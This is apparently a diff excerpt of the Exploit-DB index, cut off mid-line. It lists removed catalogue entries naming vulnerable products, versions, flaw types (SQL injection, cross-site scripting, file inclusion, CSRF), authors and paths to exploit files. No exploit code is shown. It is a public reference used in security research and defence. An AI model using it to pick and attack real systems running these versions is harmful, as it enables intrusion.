-31569,exploits/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Route' - Cross-Site Request Forgery",2014-02-11,killall-9,hardware,webapps,80 -31570,exploits/php/webapps/31570.txt,"WordPress Plugin Frontend Upload - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80 -31571,exploits/php/webapps/31571.txt,"WordPress Plugin BuddyPress 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80 -32215,exploits/php/webapps/32215.txt,"RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS search.php?key' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps, -32216,exploits/php/webapps/32216.txt,"RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS down.php?id' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps, -31573,exploits/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880 -31578,exploits/windows/webapps/31578.txt,"Tableau Server < 8.0.7 / < 8.1.2 - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80 -31579,exploits/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal",2014-02-11,"Fara Rustein",windows,webapps, -31580,exploits/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 - 'jax_Guestbook.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps, -31581,exploits/php/webapps/31581.txt,"PHPGKit 0.9 - 'connexion.php' Remote File Inclusion",2008-03-31,ZoRLu,php,webapps, -31582,exploits/asp/webapps/31582.txt,"EfesTECH Video 5.0 - 'catID' SQL Injection",2008-03-31,RMx,asp,webapps, -31584,exploits/php/webapps/31584.txt,"Terracotta - 'index.php' Local File Inclusion",2008-04-01,"Joseph Giron",php,webapps, -31587,exploits/php/webapps/31587.txt,"EasySite 2.0 - 'browser.php' Remote File Inclusion",2008-04-02,ZoRLu,php,webapps, -31588,exploits/php/webapps/31588.txt,"EasySite 2.0 - 'image_editor.php' Remote File Inclusion",2008-04-02,ZoRLu,php,webapps, -31589,exploits/php/webapps/31589.txt,"EasySite 2.0 - 'skin_chooser.php' Remote File Inclusion",2008-04-02,ZoRLu,php,webapps, -31590,exploits/php/webapps/31590.txt,"DivXDB 2002 0.94b - Multiple Cross-Site Scripting Vulnerabilities",2008-04-02,ZoRLu,php,webapps, -31595,exploits/php/webapps/31595.txt,"Joomla! / Mambo Component Showroom Joomlearn LMS - 'cat' SQL Injection",2008-04-03,The-0utl4w,php,webapps, -31596,exploits/php/webapps/31596.txt,"mcGallery 1.1 - 'admin.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps, -31597,exploits/php/webapps/31597.txt,"mcGallery 1.1 - 'index.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps, -31598,exploits/php/webapps/31598.txt,"mcGallery 1.1 - 'sess.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps, -31599,exploits/php/webapps/31599.txt,"mcGallery 1.1 - 'stats.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps, -31600,exploits/php/webapps/31600.txt,"mcGallery 1.1 - 'detail.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps, -31601,exploits/php/webapps/31601.txt,"mcGallery 1.1 - 'resize.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps, -31602,exploits/php/webapps/31602.txt,"mcGallery 1.1 - 'show.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps, -31603,exploits/php/webapps/31603.html,"Parallels Virtuozzo Containers 3.0.0-25.4/4.0.0-365.6 VZPP Interface File Manger - Cross-Site Request Forgery",2008-04-03,poplix,php,webapps, -31604,exploits/php/webapps/31604.html,"Parallels Virtuozzo Containers 3.0.0-25.4.swsoft VZPP Interface Change Pass - Cross-Site Request Forgery",2008-04-03,poplix,php,webapps, -31605,exploits/php/webapps/31605.txt,"Poplar Gedcom Viewer 2.0 - Search Page Multiple Cross-Site Scripting Vulnerabilities",2008-04-04,ZoRLu,php,webapps, -31606,exploits/php/webapps/31606.txt,"Glossaire 2.0 - 'glossaire.php' Cross-Site Scripting",2008-04-04,ZoRLu,php,webapps, -31608,exploits/php/webapps/31608.txt,"KwsPHP 1.0 ConcoursPhoto Module - 'VIEW' Cross-Site Scripting",2008-04-04,"H-T Team",php,webapps, -31609,exploits/php/webapps/31609.txt,"Nuke ET 3.4 - 'mensaje' HTML Injection",2008-04-04,"Jose Luis Zayas",php,webapps, -31610,exploits/php/webapps/31610.txt,"RobotStats 0.1 - 'graph.php?DOCUMENT_ROOT' Remote File Inclusion",2008-04-04,ZoRLu,php,webapps, -31611,exploits/php/webapps/31611.txt,"RobotStats 0.1 - 'robotstats.inc.php?DOCUMENT_ROOT' Remote File Inclusion",2008-04-04,ZoRLu,php,webapps, -31614,exploits/php/webapps/31614.txt,"Tiny Portal 1.0 - 'shouts' Cross-Site Scripting",2008-04-04,Y433r,php,webapps, -31616,exploits/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Remote File Inclusion",2008-04-04,ZoRLu,php,webapps, -31617,exploits/hardware/webapps/31617.txt,"NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps, -31618,exploits/ios/webapps/31618.txt,"jDisk (stickto) 2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,ios,webapps, -31621,exploits/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting",2008-04-07,syniack,java,webapps, -31622,exploits/php/webapps/31622.txt,"URLStreet 1.0 - 'seeurl.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-07,ZoRLu,php,webapps, -31623,exploits/php/webapps/31623.txt,"Wikepage Opus 13 2007.2 - 'index.php' Multiple Directory Traversal Vulnerabilities",2008-04-07,A.nosrati,php,webapps, -31625,exploits/php/webapps/31625.txt,"Prozilla Gaming Directory 1.0 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps, -31626,exploits/php/webapps/31626.txt,"Prozilla Software Index 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps, -31628,exploits/php/webapps/31628.txt,"Swiki 1.5 - HTML Injection / Cross-Site Scripting",2008-04-08,"Brad Antoniewicz",php,webapps, -31631,exploits/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade 2.2 - 'gid' SQL Injection",2008-04-09,MantiS,php,webapps, -31633,exploits/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Inclusion",2008-04-09,bd0rk,php,webapps, -31636,exploits/php/webapps/31636.txt,"W2B PHPHotResources - 'cat.php' SQL Injection",2008-04-11,The-0utl4w,php,webapps, -31637,exploits/php/webapps/31637.txt,"W2B Dating Club - 'browse.php' SQL Injection",2008-04-11,The-0utl4w,php,webapps, -31640,exploits/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection",2008-04-13,S@BUN,php,webapps, -31641,exploits/java/webapps/31641.txt,"Business Objects Infoview - 'cms' Cross-Site Scripting",2008-04-14,"Sebastien gioria",java,webapps, -31644,exploits/asp/webapps/31644.txt,"Cezanne 6.5.1/7 - 'cflookup.asp' Multiple Cross-Site Scripting Vulnerabilities",2008-04-14,"Juan de la Fuente Costa",asp,webapps, -31645,exploits/asp/webapps/31645.txt,"Cezanne 6.5.1/7 - 'CznCustomContainer.asp' Multiple Cross-Site Scripting Vulnerabilities",2008-04-14,"Juan de la Fuente Costa",asp,webapps, -31646,exploits/asp/webapps/31646.txt,"Cezanne 6.5.1/7 - 'home.asp?CFTARGET' Cross-Site Scripting",2008-04-14,"Juan de la Fuente Costa",asp,webapps, -31647,exploits/multiple/webapps/31647.txt,"CA 2E Web Option 8.1.2 - Authentication Bypass",2014-02-13,"Mike Emery",multiple,webapps, -31648,exploits/asp/webapps/31648.txt,"Cezanne 7 - 'cflookup.asp?FUNID' SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps, -31649,exploits/asp/webapps/31649.txt,"Cezanne 7 - '/CznCommon/CznCustomContainer.asp?FUNID' SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps, -31650,exploits/asp/webapps/31650.txt,"Cezanne Software 6.5.1/7 - 'CFLogon.asp' Cross-Site Scripting",2008-04-14,"Juan de la Fuente Costa",asp,webapps, -31651,exploits/php/webapps/31651.txt,"amfPHP 1.2 - '/browser/methodTable.php?class' Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps, -31652,exploits/php/webapps/31652.txt,"amfPHP 1.2 - '/browser/code.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-15,"Alberto Cuesta Partida",php,webapps, -31653,exploits/php/webapps/31653.txt,"amfPHP 1.2 - '/browser/details?class' Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps, -31654,exploits/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Remote File Inclusion",2008-04-15,THuM4N,php,webapps, -31655,exploits/php/webapps/31655.txt,"Istant-Replay - 'read.php' Remote File Inclusion",2008-04-15,THuGM4N,php,webapps, -31658,exploits/php/webapps/31658.txt,"MyBoard 1.0.12 - 'rep.php' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps, -31659,exploits/php/webapps/31659.txt,"PHP-Stats 0.1.9.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-17,ZoRLu,php,webapps, -31660,exploits/php/webapps/31660.txt,"EsContacts 1.0 - 'add_groupe.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps, -31661,exploits/php/webapps/31661.txt,"EsContacts 1.0 - 'contacts.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps, -31662,exploits/php/webapps/31662.txt,"EsContacts 1.0 - 'groupes.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps, -31663,exploits/php/webapps/31663.txt,"EsContacts 1.0 - 'importer.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps, -31664,exploits/php/webapps/31664.txt,"EsContacts 1.0 - 'login.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps, -31665,exploits/php/webapps/31665.txt,"EsContacts 1.0 - 'search.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps, -31666,exploits/asp/webapps/31666.txt,"Cobalt 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,asp,webapps, -31668,exploits/php/webapps/31668.txt,"TLM CMS 3.1 - Multiple SQL Injections",2008-04-18,ZoRLu,php,webapps, -31669,exploits/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",php,webapps, -31670,exploits/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps, -31671,exploits/php/webapps/31671.html,"TorrentFlux 2.3 - 'admin.php' Cross-Site Request Forgery (Add Admin)",2008-04-18,"Michael Brooks",php,webapps, -31672,exploits/php/webapps/31672.txt,"uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,php,webapps, -31673,exploits/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,multiple,webapps, -31674,exploits/php/webapps/31674.txt,"XOOPS Recette 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,php,webapps, -31676,exploits/php/webapps/31676.txt,"Host Directory PRO - Cookie Security Bypass",2008-04-20,Crackers_Child,php,webapps, -31677,exploits/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 - 'beg' Cross-Site Scripting",2008-04-21,ZoRLu,php,webapps, -31678,exploits/php/webapps/31678.txt,"SMF 1.1.4 - Audio CAPTCHA Security Bypass",2008-04-21,"Michael Brooks",php,webapps, -31679,exploits/php/webapps/31679.txt,"PortailPHP 2.0 - 'mod_search' Remote File Inclusion",2008-04-21,ZoRLu,php,webapps, -31714,exploits/php/webapps/31714.txt,"C-News 1.0.1 - 'install.php' Cross-Site Scripting",2008-04-30,ZoRLu,php,webapps, -31681,exploits/php/webapps/31681.py,"XOOPS 2.0.14 Article Module - 'article.php' SQL Injection",2008-04-21,Cr@zy_King,php,webapps, -31682,exploits/php/webapps/31682.txt,"S9Y Serendipity 1.3 - Referer HTTP Header Cross-Site Scripting",2008-04-22,"Hanno Boeck",php,webapps, -31686,exploits/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,multiple,webapps,80 -31690,exploits/hardware/webapps/31690.txt,"Trendchip HG520 ADSL2+ Wireless Modem - Cross-Site Request Forgery",2014-02-16,"Dhruv Shah",hardware,webapps,80 -31691,exploits/ios/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - Local File Inclusion",2014-02-16,Vulnerability-Lab,ios,webapps,8080 -31692,exploits/ios/webapps/31692.txt,"mbDriveHD 1.0.7 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080 -31693,exploits/ios/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080 -31702,exploits/php/webapps/31702.txt,"PHP-Nuke DownloadsPlus Module - Arbitrary File Upload",2008-04-24,ZoRLu,php,webapps, -31703,exploits/php/webapps/31703.txt,"Pixel Motion Blog - 'list_article.php' Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps, -31704,exploits/php/webapps/31704.txt,"PHCDownload 1.1 - '/admin/index.php?hash' SQL Injection",2008-04-24,ZoRLu,php,webapps, -31705,exploits/php/webapps/31705.txt,"PHCDownload 1.1 - '/upload/install/index.php?step' Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps, -31708,exploits/php/webapps/31708.txt,"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion",2008-04-26,NoGe,php,webapps, -31709,exploits/php/webapps/31709.txt,"Siteman 2.0.x2 - 'module' Cross-Site Scripting / Local File Inclusion",2008-04-26,"Khashayar Fereidani",php,webapps, -31716,exploits/php/webapps/31716.txt,"VWar 1.6.1 R2 - Multiple Remote Vulnerabilities",2008-05-01,"Darren McDonald",php,webapps, -31717,exploits/php/webapps/31717.txt,"MJGUEST 6.7 - 'QT 'mjguest.php' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps, -31719,exploits/php/webapps/31719.pl,"KnowledgeQuest 2.6 - Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,php,webapps, -31720,exploits/php/webapps/31720.txt,"QT-cute QuickTalk Guestbook 1.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,php,webapps, -31721,exploits/php/webapps/31721.txt,"EJ3 BlackBook 1.0 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,"Khashayar Fereidani",php,webapps, -31722,exploits/php/webapps/31722.txt,"EJ3 BlackBook 1.0 - 'header.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,"Khashayar Fereidani",php,webapps, -31723,exploits/php/webapps/31723.txt,"Alumni 1.0.8/1.0.9 - 'info.php?id' SQL Injection",2008-05-02,hadihadi,php,webapps, -31724,exploits/php/webapps/31724.txt,"Alumni 1.0.8/1.0.9 - 'index.php?year' Cross-Site Scripting",2008-05-02,hadihadi,php,webapps, -31725,exploits/php/webapps/31725.txt,"Zen Cart 2008 - 'index.php?keyword' SQL Injection",2008-05-02,"Ivan Sanchez",php,webapps, -31726,exploits/php/webapps/31726.txt,"Zen Cart 2008 - 'index.php?keyword' Cross-Site Scripting",2008-05-02,"Ivan Sanchez",php,webapps, -31727,exploits/php/webapps/31727.txt,"Chicomas 2.0.4 - 'index.php' Cross-Site Scripting",2008-05-02,"Hadi Kiamarsi",php,webapps, -31729,exploits/php/webapps/31729.pl,"SiteXS CMS 0.1.1 - 'upload.php' Arbitrary File Upload",2008-05-03,"Hadi Kiamarsi",php,webapps, -31730,exploits/php/webapps/31730.txt,"GEDCOM_TO_MYSQL - '/PHP/prenom.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,ZoRLu,php,webapps, -31731,exploits/php/webapps/31731.txt,"GEDCOM_TO_MYSQL - '/PHP/index.php?nom_branche' Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps, -31732,exploits/php/webapps/31732.txt,"GEDCOM_TO_MYSQL - '/PHP/info.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,ZoRLu,php,webapps, -31733,exploits/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496 -32240,exploits/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps, -31734,exploits/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80 -31735,exploits/php/webapps/31735.txt,"Concrete5 CMS 5.6.2.1 - 'index.php?cID' SQL Injection",2014-02-18,killall-9,php,webapps,80 -31738,exploits/php/webapps/31738.py,"Open Web Analytics 1.5.4 - 'owa_email_address' SQL Injection",2014-02-18,"Dana James Traversie",php,webapps, -31739,exploits/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injections",2008-05-05,ZoRLu,php,webapps, -31740,exploits/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps, -31741,exploits/php/webapps/31741.txt,"Maian Uploader 4.0 - 'keywords' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps, -31742,exploits/php/webapps/31742.txt,"Maian Uploader 4.0 - 'index.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps, -31743,exploits/php/webapps/31743.txt,"Maian Uploader 4.0 - 'header.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps, -31744,exploits/php/webapps/31744.txt,"osCommerce 2.1/2.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,"David Sopas Ferreira",php,webapps, -31745,exploits/php/webapps/31745.txt,"BatmanPorTaL - 'uyeadmin.asp?id' SQL Injection",2008-05-05,U238,php,webapps, -31746,exploits/php/webapps/31746.txt,"BatmanPorTaL - 'profil.asp?id' SQL Injection",2008-05-05,U238,php,webapps, -31747,exploits/php/webapps/31747.pl,"iGaming CMS 1.5 - 'poll_vote.php' SQL Injection",2008-05-05,Cod3rZ,php,webapps, -31749,exploits/php/webapps/31749.py,"RunCMS 1.6.1 - 'pm.class.php' Multiple SQL Injections",2008-05-06,The:Paradox,php,webapps, -31750,exploits/php/webapps/31750.txt,"QTO File Manager 1.0 - 'qtofm.php' Arbitrary File Upload",2008-05-06,"CrAzY CrAcKeR",php,webapps, -31751,exploits/php/webapps/31751.txt,"Sphider 1.3.4 - 'query' Cross-Site Scripting",2008-05-06,"Christian Holler",php,webapps, -31752,exploits/php/webapps/31752.txt,"Forum Rank System 6 - 'settings['locale']' Multiple Local File Inclusions",2008-05-07,Matrix86,php,webapps, -31753,exploits/php/webapps/31753.txt,"Tux CMS 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-07,"Hadi Kiamarsi",php,webapps, -31754,exploits/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 Bu (WGate) - 'wgate.dll?~service' Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps, -31755,exploits/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps, -31760,exploits/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081 -31764,exploits/hardware/webapps/31764.txt,"D-Link DIR-615 vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80 -31765,exploits/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent Cross-Site Scripting",2014-02-19,Vulnerability-Lab,hardware,webapps,3378 -31768,exploits/php/webapps/31768.txt,"WordPress Plugin BP Group Documents 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80 -31771,exploits/php/webapps/31771.txt,"cPanel 11.x - '/scripts2/knowlegebase?issue' Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps, -31772,exploits/php/webapps/31772.txt,"cPanel 11.x - '/scripts2/changeip?user' Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps, -31773,exploits/php/webapps/31773.txt,"cPanel 11.x - '/scripts2/listaccts?search' Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps, -31774,exploits/php/webapps/31774.txt,"BlogPHP 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-10,"David Sopas Ferreira",php,webapps, -31775,exploits/php/webapps/31775.txt,"OtherLogic - 'vocourse.php' SQL Injection",2008-05-10,Breeeeh,php,webapps, -31776,exploits/php/webapps/31776.txt,"WordPress Plugin WP Photo Album - 'photo' SQL Injection",2008-05-09,THE_MILLER,php,webapps, -31777,exploits/php/webapps/31777.txt,"AJ Classifieds - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps, -31778,exploits/php/webapps/31778.txt,"PHPInstantGallery 2.0 - 'index.php?Gallery' Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps, -31779,exploits/php/webapps/31779.txt,"PHPInstantGallery 2.0 - 'image.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-12,ZoRLu,php,webapps, -31780,exploits/php/webapps/31780.txt,"CyrixMED 1.4 - 'index.php' Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps, -31781,exploits/php/webapps/31781.txt,"IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injections",2008-05-12,SkyOut,php,webapps, -31782,exploits/php/webapps/31782.txt,"Claroline 1.7.5 - Multiple Remote File Inclusions",2008-05-12,MajnOoNxHaCkEr,php,webapps, -31783,exploits/php/webapps/31783.txt,"Fusebox 5.5.1 - 'fusebox5.php' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps, -31784,exploits/php/webapps/31784.txt,"phpMyAgenda 2.1 - 'infoevent.php3' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps, -31787,exploits/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal - 'linking.page.php' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps, -31790,exploits/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps, -31792,exploits/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,php,webapps,80 -31793,exploits/php/webapps/31793.txt,"Horde Turba 3.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-14,"Ivan Javier Sanchez",php,webapps, -31794,exploits/php/webapps/31794.txt,"PicsEngine 1.0 - 'index.php' Cross-Site Scripting",2008-05-14,ZoRLu,php,webapps, -31795,exploits/php/webapps/31795.txt,"Links Pile - 'link.php' SQL Injection",2008-08-14,HaCkeR_EgY,php,webapps, -31797,exploits/asp/webapps/31797.txt,"philboard 0.5 - 'W1L3D4_foruma_yeni_konu_ac.asp?forumid' SQL Injection",2008-05-14,U238,asp,webapps, -31798,exploits/php/webapps/31798.txt,"philboard 0.5 - 'W1L3D4_konuoku.asp?id' SQL Injection",2008-05-14,U238,php,webapps, -31799,exploits/php/webapps/31799.txt,"philboard 0.5 - 'W1L3D4_konuya_mesaj_yaz.asp' Multiple SQL Injections",2008-05-14,U238,php,webapps, -31800,exploits/php/webapps/31800.pl,"SunShop Shopping Cart 3.5.1 - 'index.php' SQL Injection",2008-05-15,irvian,php,webapps, -31801,exploits/php/webapps/31801.txt,"ACGV News 0.9.1 - 'glossaire.php?id' SQL Injection",2008-05-16,ZoRLu,php,webapps, -31802,exploits/php/webapps/31802.txt,"ACGV News 0.9.1 - 'glossaire.php?id' Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps, -31803,exploits/php/webapps/31803.txt,"AN Guestbook 0.4 - 'send_email.php' Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps, -31804,exploits/php/webapps/31804.txt,"Digital Hive 2.0 - 'base_include.php' Local File Inclusion",2008-05-16,ZoRLu,php,webapps, -31805,exploits/php/webapps/31805.txt,"PHP-Nuke 'KuiraniKerim' Module - 'sid' SQL Injection",2008-05-17,Lovebug,php,webapps, -31806,exploits/php/webapps/31806.txt,"bcoos 1.0.13 - 'file' Local File Inclusion",2008-05-19,Lostmon,php,webapps, -31807,exploits/php/webapps/31807.txt,"cPanel 11.21 - 'wwwact' Privilege Escalation",2008-05-19,"Ali Jasbi",php,webapps, -31808,exploits/php/webapps/31808.txt,"AppServ Open Project 2.5.10 - 'appservlang' Cross-Site Scripting",2008-05-20,"CWH Underground",php,webapps, -31809,exploits/php/webapps/31809.txt,"Starsgames Control Panel 4.6.2 - 'index.php' Cross-Site Scripting",2008-05-20,"CWH Underground",php,webapps, -31810,exploits/php/webapps/31810.txt,"Web Slider 0.6 - 'slide' SQL Injection",2008-05-20,"fahn zichler",php,webapps, -31811,exploits/asp/webapps/31811.txt,"Site Tanitimlari Scripti - Multiple SQL Injections",2008-05-20,"fahn zichler",asp,webapps, -31812,exploits/asp/webapps/31812.txt,"DizaynPlus Nobetci Eczane Takip 1.0 - 'ayrinti.asp' SQL Injection",2008-05-20,U238,asp,webapps, -31813,exploits/php/webapps/31813.txt,"eCMS 0.4.2 - Multiple Vulnerabilities",2008-05-20,hadihadi,php,webapps, -31816,exploits/java/webapps/31816.txt,"SAP Web Application Server 7.0 - '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting",2008-05-21,DSecRG,java,webapps, -31821,exploits/php/webapps/31821.txt,"PHPFreeForum 1.0 rc2 - 'error.php?message' Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps, -31822,exploits/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - '/part/menu.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,tan_prathan,php,webapps, -31823,exploits/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - '/cms/includes/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"CWH Underground",php,webapps, -31824,exploits/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 - '/cms/includes/login.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"CWH Underground",php,webapps, -31825,exploits/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps, -31826,exploits/php/webapps/31826.txt,"BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps, -31827,exploits/php/webapps/31827.txt,"BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps, -31829,exploits/php/webapps/31829.txt,"AbleDating 2.4 - 'search_results.php?keyword' SQL Injection",2008-05-22,"Ali Jasbi",php,webapps, -31830,exploits/php/webapps/31830.txt,"AbleDating 2.4 - 'search_results.php?keyword' Cross-Site Scripting",2008-05-22,"Ali Jasbi",php,webapps, -32045,exploits/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps, -31833,exploits/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80 -31834,exploits/php/webapps/31834.txt,"WordPress Plugin AdRotate 3.9.4 - 'clicktracker.ph?track' SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 -31835,exploits/php/webapps/31835.txt,"Apple Safari Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps, -31836,exploits/php/webapps/31836.txt,"WordPress Plugin Upload File - 'wp-uploadfile.php' SQL Injection",2008-05-24,eserg.ru,php,webapps, -31837,exploits/php/webapps/31837.txt,"DZOIC Handshakes 3.5 - 'fname' SQL Injection",2008-05-24,"Ali Jasbi",php,webapps, -31838,exploits/php/webapps/31838.txt,"Horde Multiple Product - 'workweek.php?Timestamp' Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps, -31839,exploits/php/webapps/31839.txt,"Horde Multiple Product - 'week.php?Timestamp' Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps, -31840,exploits/php/webapps/31840.txt,"Horde Multiple Product - 'day.php?Timestamp' Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps, -31841,exploits/php/webapps/31841.txt,"miniCWB 2.1.1 - 'connector.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-26,"CWH Underground",php,webapps, -31842,exploits/php/webapps/31842.txt,"AbleSpace 1.0 - 'adv_cat.php' SQL Injection",2008-05-26,Jasbi,php,webapps, -31843,exploits/asp/webapps/31843.txt,"Excuse Online - 'pwd.asp' SQL Injection",2008-05-26,Unohope,asp,webapps, -31844,exploits/php/webapps/31844.txt,"PHPFix 2.0 - '/fix/browse.php?kind' SQL Injection",2008-05-26,Unohope,php,webapps, -31845,exploits/php/webapps/31845.txt,"PHPFix 2.0 - '/auth/00_pass.php?account' SQL 